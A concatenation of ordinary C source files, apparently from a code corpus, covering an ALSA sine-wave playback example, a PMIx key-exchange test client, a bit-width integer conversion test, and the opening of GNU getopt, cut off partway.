*/ err = snd_pcm_hw_params_set_channels(handle, params, channels); if (err < 0) { printf("Channels count (%i) not available for playbacks: %s\n", channels, snd_strerror(err)); return err; } /* set the stream rate */ rrate = rate; err = snd_pcm_hw_params_set_rate_near(handle, params, &rrate, 0); if (err < 0) { printf("Rate %iHz not available for playback: %s\n", rate, snd_strerror(err)); return err; } if (rrate != rate) { printf("Rate doesn't match (requested %iHz, get %iHz)\n", rate, err); return -EINVAL; } /* set the buffer time */ err = snd_pcm_hw_params_set_buffer_time_near(handle, params, &buffer_time, &dir); if (err < 0) { printf("Unable to set buffer time %i for playback: %s\n", buffer_time, snd_strerror(err)); return err; } err = snd_pcm_hw_params_get_buffer_size(params, &size); if (err < 0) { printf("Unable to get buffer size for playback: %s\n", snd_strerror(err)); return err; } buffer_size = size; /* set the period time */ err = snd_pcm_hw_params_set_period_time_near(handle, params, &period_time, &dir); if (err < 0) { printf("Unable to set period time %i for playback: %s\n", period_time, snd_strerror(err)); return err; } err = snd_pcm_hw_params_get_period_size(params, &size, &dir); if (err < 0) { printf("Unable to get period size for playback: %s\n", snd_strerror(err)); return err; } period_size = size; /* write the parameters to device */ err = snd_pcm_hw_params(handle, params); if (err < 0) { printf("Unable to set hw params for playback: %s\n", snd_strerror(err)); return err; } return 0; } static int set_swparams(snd_pcm_t *handle, snd_pcm_sw_params_t *swparams) { int err; /* get the current swparams */ err = snd_pcm_sw_params_current(handle, swparams); if (err < 0) { printf("Unable to determine current swparams for playback: %s\n", snd_strerror(err)); return err; } /* start the transfer when the buffer is almost full: */ /* (buffer_size / avail_min) * avail_min */ err = snd_pcm_sw_params_set_start_threshold(handle, swparams, (buffer_size / period_size) * period_size); if (err < 0) { printf("Unable to set start threshold mode for playback: %s\n", snd_strerror(err)); return err; } /* allow the transfer when at least period_size samples can be processed */ /* or disable this mechanism when period event is enabled (aka interrupt like style processing) */ err = snd_pcm_sw_params_set_avail_min(handle, swparams, period_event ? buffer_size : period_size); if (err < 0) { printf("Unable to set avail min for playback: %s\n", snd_strerror(err)); return err; } /* enable period events when requested */ if (period_event) { err = snd_pcm_sw_params_set_period_event(handle, swparams, 1); if (err < 0) { printf("Unable to set period event: %s\n", snd_strerror(err)); return err; } } /* write the parameters to the playback device */ err = snd_pcm_sw_params(handle, swparams); if (err < 0) { printf("Unable to set sw params for playback: %s\n", snd_strerror(err)); return err; } return 0; } /* * Underrun and suspend recovery */ static int xrun_recovery(snd_pcm_t *handle, int err) { if (verbose) printf("stream recovery\n"); if (err == -EPIPE) { /* under-run */ err = snd_pcm_prepare(handle); if (err < 0) printf("Can't recovery from underrun, prepare failed: %s\n", snd_strerror(err)); return 0; } else if (err == -ESTRPIPE) { while ((err = snd_pcm_resume(handle)) == -EAGAIN) sleep(1); /* wait until the suspend flag is released */ if (err < 0) { err = snd_pcm_prepare(handle); if (err < 0) printf("Can't recovery from suspend, prepare failed: %s\n", snd_strerror(err)); } return 0; } return err; } /* * Transfer method - write only */ static int write_loop(snd_pcm_t *handle, signed short *samples, snd_pcm_channel_area_t *areas) { double phase = 0; signed short *ptr; int err, cptr; while (1) { generate_sine(areas, 0, period_size, &phase); ptr = samples; cptr = period_size; while (cptr > 0) { err = snd_pcm_writei(handle, ptr, cptr); if (err == -EAGAIN) continue; if (err < 0) { if (xrun_recovery(handle, err) < 0) { printf("Write error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } break; /* skip one period */ } ptr += err * channels; cptr -= err; } } } /* * Transfer method - write and wait for room in buffer using poll */ static int wait_for_poll(snd_pcm_t *handle, struct pollfd *ufds, unsigned int count) { unsigned short revents; while (1) { poll(ufds, count, -1); snd_pcm_poll_descriptors_revents(handle, ufds, count, &revents); if (revents & POLLERR) return -EIO; if (revents & POLLOUT) return 0; } } static int write_and_poll_loop(snd_pcm_t *handle, signed short *samples, snd_pcm_channel_area_t *areas) { struct pollfd *ufds; double phase = 0; signed short *ptr; int err, count, cptr, init; count = snd_pcm_poll_descriptors_count (handle); if (count <= 0) { printf("Invalid poll descriptors count\n"); return count; } ufds = malloc(sizeof(struct pollfd) * count); if (ufds == NULL) { printf("No enough memory\n"); return -ENOMEM; } if ((err = snd_pcm_poll_descriptors(handle, ufds, count)) < 0) { printf("Unable to obtain poll descriptors for playback: %s\n", snd_strerror(err)); return err; } init = 1; while (1) { if (!init) { err = wait_for_poll(handle, ufds, count); if (err < 0) { if (snd_pcm_state(handle) == SND_PCM_STATE_XRUN || snd_pcm_state(handle) == SND_PCM_STATE_SUSPENDED) { err = snd_pcm_state(handle) == SND_PCM_STATE_XRUN ? -EPIPE : -ESTRPIPE; if (xrun_recovery(handle, err) < 0) { printf("Write error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } init = 1; } else { printf("Wait for poll failed\n"); return err; } } } generate_sine(areas, 0, period_size, &phase); ptr = samples; cptr = period_size; while (cptr > 0) { err = snd_pcm_writei(handle, ptr, cptr); if (err < 0) { if (xrun_recovery(handle, err) < 0) { printf("Write error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } init = 1; break; /* skip one period */ } if (snd_pcm_state(handle) == SND_PCM_STATE_RUNNING) init = 0; ptr += err * channels; cptr -= err; if (cptr == 0) break; /* it is possible, that the initial buffer cannot store */ /* all data from the last period, so wait awhile */ err = wait_for_poll(handle, ufds, count); if (err < 0) { if (snd_pcm_state(handle) == SND_PCM_STATE_XRUN || snd_pcm_state(handle) == SND_PCM_STATE_SUSPENDED) { err = snd_pcm_state(handle) == SND_PCM_STATE_XRUN ? -EPIPE : -ESTRPIPE; if (xrun_recovery(handle, err) < 0) { printf("Write error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } init = 1; } else { printf("Wait for poll failed\n"); return err; } } } } } /* * Transfer method - asynchronous notification */ struct async_private_data { signed short *samples; snd_pcm_channel_area_t *areas; double phase; }; static void async_callback(snd_async_handler_t *ahandler) { snd_pcm_t *handle = snd_async_handler_get_pcm(ahandler); struct async_private_data *data = snd_async_handler_get_callback_private(ahandler); signed short *samples = data->samples; snd_pcm_channel_area_t *areas = data->areas; snd_pcm_sframes_t avail; int err; avail = snd_pcm_avail_update(handle); while (avail >= period_size) { generate_sine(areas, 0, period_size, &data->phase); err = snd_pcm_writei(handle, samples, period_size); if (err < 0) { printf("Write error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } if (err != period_size) { printf("Write error: written %i expected %li\n", err, period_size); exit(EXIT_FAILURE); } avail = snd_pcm_avail_update(handle); } } static int async_loop(snd_pcm_t *handle, signed short *samples, snd_pcm_channel_area_t *areas) { struct async_private_data data; snd_async_handler_t *ahandler; int err, count; data.samples = samples; data.areas = areas; data.phase = 0; err = snd_async_add_pcm_handler(&ahandler, handle, async_callback, &data); if (err < 0) { printf("Unable to register async handler\n"); exit(EXIT_FAILURE); } for (count = 0; count < 2; count++) { generate_sine(areas, 0, period_size, &data.phase); err = snd_pcm_writei(handle, samples, period_size); if (err < 0) { printf("Initial write error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } if (err != period_size) { printf("Initial write error: written %i expected %li\n", err, period_size); exit(EXIT_FAILURE); } } if (snd_pcm_state(handle) == SND_PCM_STATE_PREPARED) { err = snd_pcm_start(handle); if (err < 0) { printf("Start error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } } /* because all other work is done in the signal handler, suspend the process */ while (1) { sleep(1); } } /* * Transfer method - asynchronous notification + direct write */ static void async_direct_callback(snd_async_handler_t *ahandler) { snd_pcm_t *handle = snd_async_handler_get_pcm(ahandler); struct async_private_data *data = snd_async_handler_get_callback_private(ahandler); const snd_pcm_channel_area_t *my_areas; snd_pcm_uframes_t offset, frames, size; snd_pcm_sframes_t avail, commitres; snd_pcm_state_t state; int first = 0, err; while (1) { state = snd_pcm_state(handle); if (state == SND_PCM_STATE_XRUN) { err = xrun_recovery(handle, -EPIPE); if (err < 0) { printf("XRUN recovery failed: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } first = 1; } else if (state == SND_PCM_STATE_SUSPENDED) { err = xrun_recovery(handle, -ESTRPIPE); if (err < 0) { printf("SUSPEND recovery failed: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } } avail = snd_pcm_avail_update(handle); if (avail < 0) { err = xrun_recovery(handle, avail); if (err < 0) { printf("avail update failed: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } first = 1; continue; } if (avail < period_size) { if (first) { first = 0; err = snd_pcm_start(handle); if (err < 0) { printf("Start error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } } else { break; } continue; } size = period_size; while (size > 0) { frames = size; err = snd_pcm_mmap_begin(handle, &my_areas, &offset, &frames); if (err < 0) { if ((err = xrun_recovery(handle, err)) < 0) { printf("MMAP begin avail error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } first = 1; } generate_sine(my_areas, offset, frames, &data->phase); commitres = snd_pcm_mmap_commit(handle, offset, frames); if (commitres < 0 || (snd_pcm_uframes_t)commitres != frames) { if ((err = xrun_recovery(handle, commitres >= 0 ? -EPIPE : commitres)) < 0) { printf("MMAP commit error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } first = 1; } size -= frames; } } } static int async_direct_loop(snd_pcm_t *handle, signed short *samples ATTRIBUTE_UNUSED, snd_pcm_channel_area_t *areas ATTRIBUTE_UNUSED) { struct async_private_data data; snd_async_handler_t *ahandler; const snd_pcm_channel_area_t *my_areas; snd_pcm_uframes_t offset, frames, size; snd_pcm_sframes_t commitres; int err, count; data.samples = NULL; /* we do not require the global sample area for direct write */ data.areas = NULL; /* we do not require the global areas for direct write */ data.phase = 0; err = snd_async_add_pcm_handler(&ahandler, handle, async_direct_callback, &data); if (err < 0) { printf("Unable to register async handler\n"); exit(EXIT_FAILURE); } for (count = 0; count < 2; count++) { size = period_size; while (size > 0) { frames = size; err = snd_pcm_mmap_begin(handle, &my_areas, &offset, &frames); if (err < 0) { if ((err = xrun_recovery(handle, err)) < 0) { printf("MMAP begin avail error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } } generate_sine(my_areas, offset, frames, &data.phase); commitres = snd_pcm_mmap_commit(handle, offset, frames); if (commitres < 0 || (snd_pcm_uframes_t)commitres != frames) { if ((err = xrun_recovery(handle, commitres >= 0 ? -EPIPE : commitres)) < 0) { printf("MMAP commit error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } } size -= frames; } } err = snd_pcm_start(handle); if (err < 0) { printf("Start error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } /* because all other work is done in the signal handler, suspend the process */ while (1) { sleep(1); } } /* * Transfer method - direct write only */ static int direct_loop(snd_pcm_t *handle, signed short *samples ATTRIBUTE_UNUSED, snd_pcm_channel_area_t *areas ATTRIBUTE_UNUSED) { double phase = 0; const snd_pcm_channel_area_t *my_areas; snd_pcm_uframes_t offset, frames, size; snd_pcm_sframes_t avail, commitres; snd_pcm_state_t state; int err, first = 1; while (1) { state = snd_pcm_state(handle); if (state == SND_PCM_STATE_XRUN) { err = xrun_recovery(handle, -EPIPE); if (err < 0) { printf("XRUN recovery failed: %s\n", snd_strerror(err)); return err; } first = 1; } else if (state == SND_PCM_STATE_SUSPENDED) { err = xrun_recovery(handle, -ESTRPIPE); if (err < 0) { printf("SUSPEND recovery failed: %s\n", snd_strerror(err)); return err; } } avail = snd_pcm_avail_update(handle); if (avail < 0) { err = xrun_recovery(handle, avail); if (err < 0) { printf("avail update failed: %s\n", snd_strerror(err)); return err; } first = 1; continue; } if (avail < period_size) { if (first) { first = 0; err = snd_pcm_start(handle); if (err < 0) { printf("Start error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } } else { err = snd_pcm_wait(handle, -1); if (err < 0) { if ((err = xrun_recovery(handle, err)) < 0) { printf("snd_pcm_wait error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } first = 1; } } continue; } size = period_size; while (size > 0) { frames = size; err = snd_pcm_mmap_begin(handle, &my_areas, &offset, &frames); if (err < 0) { if ((err = xrun_recovery(handle, err)) < 0) { printf("MMAP begin avail error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } first = 1; } generate_sine(my_areas, offset, frames, &phase); commitres = snd_pcm_mmap_commit(handle, offset, frames); if (commitres < 0 || (snd_pcm_uframes_t)commitres != frames) { if ((err = xrun_recovery(handle, commitres >= 0 ? -EPIPE : commitres)) < 0) { printf("MMAP commit error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } first = 1; } size -= frames; } } } /* * Transfer method - direct write only using mmap_write functions */ static int direct_write_loop(snd_pcm_t *handle, signed short *samples, snd_pcm_channel_area_t *areas) { double phase = 0; signed short *ptr; int err, cptr; while (1) { generate_sine(areas, 0, period_size, &phase); ptr = samples; cptr = period_size; while (cptr > 0) { err = snd_pcm_mmap_writei(handle, ptr, cptr); if (err == -EAGAIN) continue; if (err < 0) { if (xrun_recovery(handle, err) < 0) { printf("Write error: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } break; /* skip one period */ } ptr += err * channels; cptr -= err; } } } /* * */ struct transfer_method { const char *name; snd_pcm_access_t access; int (*transfer_loop)(snd_pcm_t *handle, signed short *samples, snd_pcm_channel_area_t *areas); }; static struct transfer_method transfer_methods[] = { { "write", SND_PCM_ACCESS_RW_INTERLEAVED, write_loop }, { "write_and_poll", SND_PCM_ACCESS_RW_INTERLEAVED, write_and_poll_loop }, { "async", SND_PCM_ACCESS_RW_INTERLEAVED, async_loop }, { "async_direct", SND_PCM_ACCESS_MMAP_INTERLEAVED, async_direct_loop }, { "direct_interleaved", SND_PCM_ACCESS_MMAP_INTERLEAVED, direct_loop }, { "direct_noninterleaved", SND_PCM_ACCESS_MMAP_NONINTERLEAVED, direct_loop }, { "direct_write", SND_PCM_ACCESS_MMAP_INTERLEAVED, direct_write_loop }, { NULL, SND_PCM_ACCESS_RW_INTERLEAVED, NULL } }; static void help(void) { int k; printf( "Usage: pcm [OPTION]... [FILE]...\n" "-h,--help help\n" "-D,--device playback device\n" "-r,--rate stream rate in Hz\n" "-c,--channels count of channels in stream\n" "-f,--frequency sine wave frequency in Hz\n" "-b,--buffer ring buffer size in us\n" "-p,--period period size in us\n" "-m,--method transfer method\n" "-o,--format sample format\n" "-v,--verbose show the PCM setup parameters\n" "-n,--noresample do not resample\n" "-e,--pevent enable poll event after each period\n" "\n"); printf("Recognized sample formats are:"); for (k = 0; k < SND_PCM_FORMAT_LAST; ++k) { const char *s = snd_pcm_format_name(k); if (s) printf(" %s", s); } printf("\n"); printf("Recognized transfer methods are:"); for (k = 0; transfer_methods[k].name; k++) printf(" %s", transfer_methods[k].name); printf("\n"); } int main(int argc, char *argv[]) { struct option long_option[] = { {"help", 0, NULL, 'h'}, {"device", 1, NULL, 'D'}, {"rate", 1, NULL, 'r'}, {"channels", 1, NULL, 'c'}, {"frequency", 1, NULL, 'f'}, {"buffer", 1, NULL, 'b'}, {"period", 1, NULL, 'p'}, {"method", 1, NULL, 'm'}, {"format", 1, NULL, 'o'}, {"verbose", 1, NULL, 'v'}, {"noresample", 1, NULL, 'n'}, {"pevent", 1, NULL, 'e'}, {NULL, 0, NULL, 0}, }; snd_pcm_t *handle; int err, morehelp; snd_pcm_hw_params_t *hwparams; snd_pcm_sw_params_t *swparams; int method = 0; signed short *samples; unsigned int chn; snd_pcm_channel_area_t *areas; snd_pcm_hw_params_alloca(&hwparams); snd_pcm_sw_params_alloca(&swparams); morehelp = 0; while (1) { int c; if ((c = getopt_long(argc, argv, "hD:r:c:f:b:p:m:o:vne", long_option, NULL)) < 0) break; switch (c) { case 'h': morehelp++; break; case 'D': device = strdup(optarg); break; case 'r': rate = atoi(optarg); rate = rate < 4000 ? 4000 : rate; rate = rate > 196000 ? 196000 : rate; break; case 'c': channels = atoi(optarg); channels = channels < 1 ? 1 : channels; channels = channels > 1024 ? 1024 : channels; break; case 'f': freq = atoi(optarg); freq = freq < 50 ? 50 : freq; freq = freq > 5000 ? 5000 : freq; break; case 'b': buffer_time = atoi(optarg); buffer_time = buffer_time < 1000 ? 1000 : buffer_time; buffer_time = buffer_time > 1000000 ? 1000000 : buffer_time; break; case 'p': period_time = atoi(optarg); period_time = period_time < 1000 ? 1000 : period_time; period_time = period_time > 1000000 ? 1000000 : period_time; break; case 'm': for (method = 0; transfer_methods[method].name; method++) if (!strcasecmp(transfer_methods[method].name, optarg)) break; if (transfer_methods[method].name == NULL) method = 0; break; case 'o': for (format = 0; format < SND_PCM_FORMAT_LAST; format++) { const char *format_name = snd_pcm_format_name(format); if (format_name) if (!strcasecmp(format_name, optarg)) break; } if (format == SND_PCM_FORMAT_LAST) format = SND_PCM_FORMAT_S16; if (!snd_pcm_format_linear(format) && !(format == SND_PCM_FORMAT_FLOAT_LE || format == SND_PCM_FORMAT_FLOAT_BE)) { printf("Invalid (non-linear/float) format %s\n", optarg); return 1; } break; case 'v': verbose = 1; break; case 'n': resample = 0; break; case 'e': period_event = 1; break; } } if (morehelp) { help(); return 0; } err = snd_output_stdio_attach(&output, stdout, 0); if (err < 0) { printf("Output failed: %s\n", snd_strerror(err)); return 0; } printf("Playback device is %s\n", device); printf("Stream parameters are %iHz, %s, %i channels\n", rate, snd_pcm_format_name(format), channels); printf("Sine wave rate is %.4fHz\n", freq); printf("Using transfer method: %s\n", transfer_methods[method].name); if ((err = snd_pcm_open(&handle, device, SND_PCM_STREAM_PLAYBACK, 0)) < 0) { printf("Playback open error: %s\n", snd_strerror(err)); return 0; } if ((err = set_hwparams(handle, hwparams, transfer_methods[method].access)) < 0) { printf("Setting of hwparams failed: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } if ((err = set_swparams(handle, swparams)) < 0) { printf("Setting of swparams failed: %s\n", snd_strerror(err)); exit(EXIT_FAILURE); } if (verbose > 0) snd_pcm_dump(handle, output); samples = malloc((period_size * channels * snd_pcm_format_physical_width(format)) / 8); if (samples == NULL) { printf("No enough memory\n"); exit(EXIT_FAILURE); } areas = calloc(channels, sizeof(snd_pcm_channel_area_t)); if (areas == NULL) { printf("No enough memory\n"); exit(EXIT_FAILURE); } for (chn = 0; chn < channels; chn++) { areas[chn].addr = samples; areas[chn].first = chn * snd_pcm_format_physical_width(format); areas[chn].step = channels * snd_pcm_format_physical_width(format); } err = transfer_methods[method].transfer_loop(handle, samples, areas); if (err < 0) printf("Transfer failed: %s\n", snd_strerror(err)); free(areas); free(samples); snd_pcm_close(handle); return 0; }
the_stack_data/59512733.c
#include <pmix.h> #include <sched.h> #include <stdio.h> static pmix_proc_t allproc = {}; static pmix_proc_t myproc = {}; static bool mywait = false; static bool refresh = false; static bool timeout = false; #define ERR(msg, ...) \ do { \ time_t tm = time(NULL); \ char *stm = ctime(&tm); \ stm[strlen(stm) - 1] = 0; \ fprintf(stderr, "%s ERROR: %s:%d " msg "\n", stm, __FILE__, __LINE__, ##__VA_ARGS__); \ exit(1); \ } while (0); int pmi_set_string(const char *key, void *data, size_t size) { int rc; pmix_value_t value; PMIX_VALUE_CONSTRUCT(&value); value.type = PMIX_BYTE_OBJECT; value.data.bo.bytes = data; value.data.bo.size = size; if (PMIX_SUCCESS != (rc = PMIx_Put(PMIX_GLOBAL, key, &value))) { ERR("Client ns %s rank %d: PMIx_Put failed: %s\n", myproc.nspace, myproc.rank, PMIx_Error_string(rc)); } if (PMIX_SUCCESS != (rc = PMIx_Commit())) { ERR("Client ns %s rank %d: PMIx_Commit failed: %s\n", myproc.nspace, myproc.rank, PMIx_Error_string(rc)); } /* protect the data */ value.data.bo.bytes = NULL; value.data.bo.size = 0; PMIX_VALUE_DESTRUCT(&value); printf("%s:%d PMIx_Put on %s\n", myproc.nspace, myproc.rank, key); return 0; } int pmi_get_string(uint32_t peer_rank, const char *key, void **data_out, size_t *data_size_out) { int rc; pmix_proc_t proc; pmix_value_t *pvalue; pmix_info_t info; PMIX_LOAD_PROCID(&proc, myproc.nspace, peer_rank); if (refresh) { PMIX_INFO_LOAD(&info, PMIX_GET_REFRESH_CACHE, &refresh, PMIX_BOOL); rc = PMIx_Get(&proc, key, &info, 1, &pvalue); PMIX_INFO_DESTRUCT(&info); } else if (timeout) { rc = 2; PMIX_INFO_LOAD(&info, PMIX_TIMEOUT, &rc, PMIX_INT); rc = PMIx_Get(&proc, key, &info, 1, &pvalue); PMIX_INFO_DESTRUCT(&info); } else { rc = PMIx_Get(&proc, key, NULL, 0, &pvalue); } if (PMIX_SUCCESS != rc) { ERR("Client ns %s rank %d: PMIx_Get on rank %u %s: %s\n", myproc.nspace, myproc.rank, peer_rank, key, PMIx_Error_string(rc)); } if (pvalue->type != PMIX_BYTE_OBJECT) { ERR("Client ns %s rank %d: PMIx_Get %s: got wrong data type\n", myproc.nspace, myproc.rank, key); } *data_out = pvalue->data.bo.bytes; *data_size_out = pvalue->data.bo.size; /* protect the data */ pvalue->data.bo.bytes = NULL; pvalue->data.bo.size = 0; PMIX_VALUE_RELEASE(pvalue); PMIX_PROC_DESTRUCT(&proc); printf("%s:%d PMIx_get %s returned %zi bytes\n", myproc.nspace, myproc.rank, key, data_size_out[0]); return 0; } int pmix_exchange(bool flag) { int rc; pmix_info_t info; fprintf(stderr, "Execute fence\n"); PMIX_INFO_CONSTRUCT(&info); PMIX_INFO_LOAD(&info, PMIX_COLLECT_DATA, &flag, PMIX_BOOL); rc = PMIx_Fence(&allproc, 1, &info, 1); if (PMIX_SUCCESS != rc) { fprintf(stderr, "Client ns %s rank %d: PMIx_Fence_nb failed: %d\n", myproc.nspace, myproc.rank, rc); exit(1); } PMIX_INFO_DESTRUCT(&info); return 0; } int main(int argc, char *argv[]) { char data[256] = {}; char *data_out; size_t size_out; int rc; pmix_value_t *pvalue; /* check the args */ if (1 < argc) { if (2 < argc || 0 == strncmp(argv[1], "-h", 2) || 0 == strncmp(argv[1], "--h", 3)) { fprintf(stderr, "Usage:\n"); fprintf(stderr, "\t--wait Test PMIX_GET_WAIT_FOR_KEY\n"); fprintf(stderr, "\t--refresh Test PMIX_GET_REFRESH_CACHE\n"); fprintf(stderr, "\t--timeout Test PMIX_GET_WAIT_FOR_KEY, but timeout\n"); exit(0); } if (0 == strncmp(argv[1], "--w", 3)) { mywait = true; } else if (0 == strncmp(argv[1], "--r", 3)) { refresh = true; } else if (0 == strncmp(argv[1], "--t", 3)) { timeout = true; } else { fprintf(stderr, "Invalid cmd line option: %s\n", argv[1]); fprintf(stderr, "Usage:\n"); fprintf(stderr, "\t--wait Test PMIX_GET_WAIT_FOR_KEY\n"); fprintf(stderr, "\t--refresh Test PMIX_GET_REFRESH_CACHE\n"); fprintf(stderr, "\t--timeout Test PMIX_GET_WAIT_FOR_KEY, but timeout\n"); exit(1); } } if (PMIX_SUCCESS != (rc = PMIx_Init(&myproc, NULL, 0))) { ERR("PMIx_Init failed"); exit(1); } if (myproc.rank == 0) { printf("PMIx initialized\n"); } /* job-related info is found in our nspace, assigned to the * wildcard rank as it doesn't relate to a specific rank. Setup * a name to retrieve such values */ PMIX_LOAD_PROCID(&allproc, myproc.nspace, PMIX_RANK_WILDCARD); /* get the number of procs in our job */ if (PMIX_SUCCESS != (rc = PMIx_Get(&allproc, PMIX_JOB_SIZE, NULL, 0, &pvalue))) { fprintf(stderr, "Client ns %s rank %d: PMIx_Get job size failed: %d\n", myproc.nspace, myproc.rank, rc); exit(1); } uint32_t nprocs = pvalue->data.uint32; PMIX_VALUE_RELEASE(pvalue); /* the below two lines break the subsequent PMIx_Get query on a key set later */ sprintf(data, "FIRST TIME rank %d", myproc.rank); pmi_set_string("test-key-1", data, 256); if (timeout) { sleep(10); } else if (mywait) { sleep(2); } if (0 == myproc.rank) { pmi_get_string(1, "test-key-1", (void **) &data_out, &size_out); } else { pmi_get_string(0, "test-key-1", (void **) &data_out, &size_out); } printf("%d: obtained data \"%s\"\n", myproc.rank, data_out); if (PMIX_SUCCESS != (rc = PMIx_Finalize(NULL, 0))) { ERR("Client ns %s rank %d:PMIx_Finalize failed: %d\n", myproc.nspace, myproc.rank, rc); } if (myproc.rank == 0) printf("PMIx finalized\n"); exit(0); }
the_stack_data/68888814.c
//===--- convert.c --- Test Cases for Bit Accurate Types ------------------===// // // This file is distributed under the University of Illinois Open Source // License. See LICENSE.TXT for details. // //===----------------------------------------------------------------------===// // This is a test for conversion between different int types. // //===----------------------------------------------------------------------===// #include <stdio.h> typedef int __attribute__ ((bitwidth(7))) int7; typedef int __attribute__ ((bitwidth(15))) int15; typedef int __attribute__ ((bitwidth(31))) int31; typedef int __attribute__ ((bitwidth(8))) int8; typedef unsigned int __attribute__ ((bitwidth(7))) uint7; typedef unsigned int __attribute__ ((bitwidth(15))) uint15; typedef unsigned int __attribute__ ((bitwidth(31))) uint31; typedef unsigned int __attribute__ ((bitwidth(8))) uint8; int main() { int7 i7; int15 i15; int31 i31; int8 i8; uint7 ui7; uint15 ui15; uint31 ui31; uint8 ui8; i7 = 0x7f; i15 = (int15)i7; i31 = (int31)i15; if(i15 != -1 || i31 != -1) printf("error: i15=%d, i31 = %d\n", i15, i31); ui7 = 0x7f; ui15 = (uint15)ui7; ui31 = (uint31)ui15; if(ui15 != 0x7f || ui31 != 0x7f) printf("error: ui15=%u, ui31 = %u\n", ui15, ui31); i31 = -1; i8 = (int8) i31; if(i8 != -1) printf("error: i8=%d\n", i8); i31 = 0xff; i7 = (int7) i31; printf("i7=%d\n", i7); ui31 = 0x1ff; ui8 = (uint8) ui31; printf("ui8=%u\n", ui8); i8 = (int8) ui8; printf("i8=%d\n", i8); ui7 = (uint7) i7; printf("ui7=%u\n", ui7); return 0; }
the_stack_data/132951901.c
/* Getopt for GNU. NOTE: getopt is now part of the C library, so if you don't know what "Keep this file name-space clean" means, talk to [email protected] before changing it! Copyright (C) 1987, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 2000 Free Software Foundation, Inc. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with the GNU C Library; see the file COPYING.LIB. If not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* This tells Alpha OSF/1 not to define a getopt prototype in <stdio.h>. Ditto for AIX 3.2 and <stdlib.h>. */ #ifndef _NO_PROTO # define _NO_PROTO #endif #ifdef HAVE_CONFIG_H # include <clamav-config.h> #endif #if !defined __STDC__ || !__STDC__ /* This is a separate conditional since some stdc systems reject `defined (const)'. */ # ifndef const # define const # endif #endif #include <stdio.h> #ifndef C_WINDOWS int strncmp(const char *s1, const char *s2, size_t n); #endif /* Comment out all this code if we are using the GNU C Library, and are not actually compiling the library itself. This code is part of the GNU C Library, but also included in many other GNU distributions. Compiling and linking in this code is a waste when using the GNU C library (especially if it is a shared library). Rather than having every GNU program understand `configure --with-gnu-libc' and omit the object files, it is simpler to just do this in the source for each such file. */ #define GETOPT_INTERFACE_VERSION 2 #if !defined _LIBC && defined __GLIBC__ && __GLIBC__ >= 2 # include <gnu-versions.h> # if _GNU_GETOPT_INTERFACE_VERSION == GETOPT_INTERFACE_VERSION # define ELIDE_CODE # endif #endif #ifndef ELIDE_CODE /* This needs to come after some library #include to get __GNU_LIBRARY__ defined. */ #ifdef __GNU_LIBRARY__ /* Don't include stdlib.h for non-GNU C libraries because some of them contain conflicting prototypes for getopt. */ # include <stdlib.h> # include <unistd.h> #endif /* GNU C library. */ #ifdef VMS # include <unixlib.h> # if HAVE_STRING_H - 0 # include <string.h> # endif #endif #ifndef _ /* This is for other GNU distributions with internationalized messages. */ # if defined HAVE_LIBINTL_H || defined _LIBC # include <libintl.h> # ifndef _ # define _(msgid) gettext (msgid) # endif # else # define _(msgid) (msgid) # endif #endif /* This version of `getopt' appears to the caller like standard Unix `getopt' but it behaves differently for the user, since it allows the user to intersperse the options with the other arguments. As `getopt' works, it permutes the elements of ARGV so that, when it is done, all the options precede everything else. Thus all application programs are extended to handle flexible argument order. Setting the environment variable POSIXLY_CORRECT disables permutation. Then the behavior is completely standard. GNU application programs can use a third alternative mode in which they can distinguish the relative order of options and other arguments. */ #include "getopt.h" /* For communication from `getopt' to the caller. When `getopt' finds an option that takes an argument, the argument value is returned here. Also, when `ordering' is RETURN_IN_ORDER, each non-option ARGV-element is returned here. */ char *optarg; /* Index in ARGV of the next element to be scanned. This is used for communication to and from the caller and for communication between successive calls to `getopt'. On entry to `getopt', zero means this is the first call; initialize. When `getopt' returns -1, this is the index of the first of the non-option elements that the caller should itself scan. Otherwise, `optind' communicates from one call to the next how much of ARGV has been scanned so far. */ /* 1003.2 says this must be 1 before any call. */ int optind = 1; /* Formerly, initialization of getopt depended on optind==0, which causes problems with re-calling getopt as programs generally don't know that. */ int __getopt_initialized; /* The next char to be scanned in the option-element in which the last option character we returned was found. This allows us to pick up the scan where we left off. If this is zero, or a null string, it means resume the scan by advancing to the next ARGV-element. */ static char *nextchar; /* Callers store zero here to inhibit the error message for unrecognized options. */ int opterr = 1; /* Set to an option character which was unrecognized. This must be initialized on some systems to avoid linking in the system's own getopt implementation. */ int optopt = '?'; /* Describe how to deal with options that follow non-option ARGV-elements. If the caller did not specify anything, the default is REQUIRE_ORDER if the environment variable POSIXLY_CORRECT is defined, PERMUTE otherwise. REQUIRE_ORDER means don't recognize them as options; stop option processing when the first non-option is seen. This is what Unix does. This mode of operation is selected by either setting the environment variable POSIXLY_CORRECT, or using `+' as the first character of the list of option characters. PERMUTE is the default. We permute the contents of ARGV as we scan, so that eventually all the non-options are at the end. This allows options 